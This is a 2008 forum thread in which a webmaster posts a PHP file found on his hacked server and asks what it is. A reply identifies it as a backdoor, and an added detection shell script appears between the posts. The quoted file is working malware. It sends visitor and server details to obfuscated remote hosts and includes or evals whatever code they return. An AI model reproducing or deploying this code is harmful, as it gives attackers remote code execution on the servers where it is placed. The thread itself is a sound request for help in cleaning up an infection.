Is This Some Kind of Hack?

Discussion in 'Security' started by dmje, Mar 1, 2008.

  1. #1
    I found the following php file in a directory on my server:

    <? error_reporting(0);   // silence warnings so nothing shows up for the site owner
    $s="e";                  // literal marker inserted into the query string below
    // Collect request details, falling back to the pre-$_SERVER global names on old PHP
    $a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
    $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
    $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
    $d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
    $e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
    $f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
    $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
    $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
    $i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
    $j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
    // Pack everything, base64-encoded and dot-separated, into one query string
    $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j);
    // Fetch and run whatever a remote host returns (needs allow_url_include).
    // "aHR0cDovLw==" decodes to "http://", "YS5yc2RjcmFmdC53cw==" to "a.rsdcraft.ws"
    if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str)));
    // Fallback host: "YWQucnVud2ViLmluZm8=" decodes to "ad.runweb.info"
    else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str));
    // Last resort: eval() the body fetched from "http://7.xmldata.info/?" (the decoded literal)
    else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str));
    ?>


    Can somebody tell me what the devil this thing is, what it does, and how I stop it?

    A little background:

    I noticed in my cPanel "latest visitors" section that I was showing a lot of nonexistent pages with an HTTP code of 200 instead of the proper 404 code, and all of them had the agent string of googlebot and a correct IP address for googlebot; however, those same pages would show in the error log section of cPanel as not found.

    I checked the server response with a header checker and it is returning a 404 as it should. All of the nonexistent pages were being called from my linkmachine directory. I checked the linkmachine directory and found the file above and others like it spread all through the linkmachine directory, and even in other directories on the site that had php files in them.

    I removed all of those php files that I could find on the site, thinking that would take care of the issue, but it did not. cPanel still shows the requests for nonexistent linkmachine directory pages, now with the correct HTTP header of 404, but every few minutes a request is made for the file above, followed immediately by a request for a nonexistent page in the linkmachine directory.

    I cannot find any more of those php files, and I cannot figure out why the requests are still being generated.

    Somebody help please...

    Thanks,
     
    dmje, Mar 1, 2008 IP
  2. DarkMindZ

    DarkMindZ Guest

    #2
    Hey,

    Yes, you have been hacked; those are PHP backdoors left by the hacker so he can keep access to your server.

    Find the username/owner of those files, then find all PHP files with that owner on the server and check each one for backdoors, and hope the hacker did not gain root.

    Good luck, let me know if you need any help.
     
    DarkMindZ, Mar 1, 2008 IP
  3. dmje

    dmje Peon

    #3
    Hello,

    Thanks for the reply.

    How do I find out the username/owner of the files?

    I have found that it was some type of warez in my linkmachine directory, so the linkmachine directory has been deleted and will be redone with a clean install.

    I need to check other sites on this server that use linkmachine but I am unsure how to find if they have been infected.

    Any help will be appreciated
     
    dmje, Mar 1, 2008 IP
  4. DarkMindZ

    DarkMindZ Guest

    #4
    Do an ls -la on the directory the file is in, and you will see

    username/group filename.php
     
    DarkMindZ, Mar 1, 2008 IP
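An added example (not code from this thread) that carries out the steps suggested in posts #2 and #4 over a whole web root: list PHP files by owner, flag files carrying the signature of the backdoor quoted in post #1, and decode its base64 literals so the remote hosts it contacts can be read and blocked. It assumes a POSIX sh with find, grep, sed and a coreutils-style "base64 -d".

```shell
#!/bin/sh
# Added example, not code from this thread. Triage helpers for the steps in
# posts #2 and #4: list PHP files by owner, flag files carrying the signature
# of the backdoor quoted in post #1, and decode its base64 literals.
# Assumes a POSIX sh with find, grep, sed and a coreutils-style "base64 -d".

# Every PHP file under directory $1 owned by user $2 (what "ls -la" shows per
# file, applied to the whole tree). The owner is the hint from post #4.
php_files_owned_by() {
    find "$1" -type f -name '*.php' -user "$2" 2>/dev/null | sort
}

# PHP files under $1 whose source feeds a base64_decode() result straight into
# include() or eval(file_get_contents()), the pattern used by the quoted file.
find_backdoors() {
    find "$1" -type f -name '*.php' -exec grep -lE \
        'include\(base64_decode\(|eval\(file_get_contents\(base64_decode\(' {} + 2>/dev/null |
        sort
}

# Decode each base64_decode("...") literal in file $1 as "<encoded> -> <clear>",
# which exposes the remote hosts the backdoor pulls code from (block them).
decode_literals() {
    grep -oE 'base64_decode\("[A-Za-z0-9+/=]+"\)' "$1" |
        sed -E 's/^base64_decode\("([^"]+)"\)$/\1/' |
        while IFS= read -r enc; do
            printf '%s -> %s\n' "$enc" "$(printf '%s' "$enc" | base64 -d)"
        done
}

# Demo on a constructed tree; bad.php is a stub with the marker, never executed.
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/linkmachine"
    printf '<? include(base64_decode("aHR0cDovLw==")."x"); ?>\n' > "$tmp/linkmachine/bad.php"
    printf '<?php echo "hello"; ?>\n' > "$tmp/index.php"
    echo "owned by $(id -un):"; php_files_owned_by "$tmp" "$(id -un)"
    echo "suspicious:";         find_backdoors "$tmp"
    decode_literals "$tmp/linkmachine/bad.php"
    rm -rf "$tmp"
}

demo
```

Run it against the real web root (for example find_backdoors /home/user/public_html) and treat every hit as a file to quarantine and compare against a clean copy, since the thread's sample also had siblings "spread all through" the tree.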
  5. dmje

    dmje Peon

    #5
    How do I do that on a Linux server? I'm not familiar with those commands.
     
    dmje, Mar 1, 2008 IP
  6. DarkMindZ

    DarkMindZ Guest

    #6
    Add me on MSN:
     
    DarkMindZ, Mar 1, 2008 IP
  7. dmje

    dmje Peon

    #7
    Do you happen to have Yahoo Messenger? I already have that installed.
     
    dmje, Mar 1, 2008 IP
  8. DarkMindZ

    DarkMindZ Guest

    #8
    You can still add me on there.

    If not, just give me your Yahoo and I can add you.
     
    DarkMindZ, Mar 1, 2008 IP
  9. dmje

    dmje Peon

    #9
    My Yahoo is
     
    dmje, Mar 1, 2008 IP